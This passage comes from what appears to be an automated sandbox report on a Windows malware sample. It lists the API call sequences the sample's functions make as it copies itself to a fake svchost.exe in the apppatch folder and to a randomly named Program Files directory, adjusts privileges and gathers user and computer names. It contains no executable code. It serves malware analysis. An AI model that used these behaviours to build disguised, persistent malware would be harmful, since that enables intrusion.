FilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,
LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 9_2_02BD4B00
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402D30
    Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402D30
    Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02BB7FD0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrSt
rIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02BD2BB0
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02BD2B40
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,2_2_02BBD970
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02BB1170
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02BD1690
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,2_2_02BB3610
    Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_02BCCE10
    Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02BB1660
    Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02BD3F50
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02BD3CE0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02BD1460
    Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,StrStrIA,2_2_02BCADE0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_02BD25C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_008D1170
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,5_2_008DD970
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_008F2BB0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_008F2B40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_008F3CE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_008F1460
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_008F25C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserNameA,memset,StrStrIA,5_2_008EADE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_008F1690
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,5_2_008D3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_008ECE10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_008D1660
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_008D7FD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_008E5720
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_008F3F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_00881170
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,6_2_0088D970
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_008A2BB0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_008A2B40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_008A3CE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_008A1460
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_008A25C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserNameA,memset,StrStrIA,6_2_0089ADE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_008A1690
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,6_2_00883610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_0089CE10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_00881660
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_00887FD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 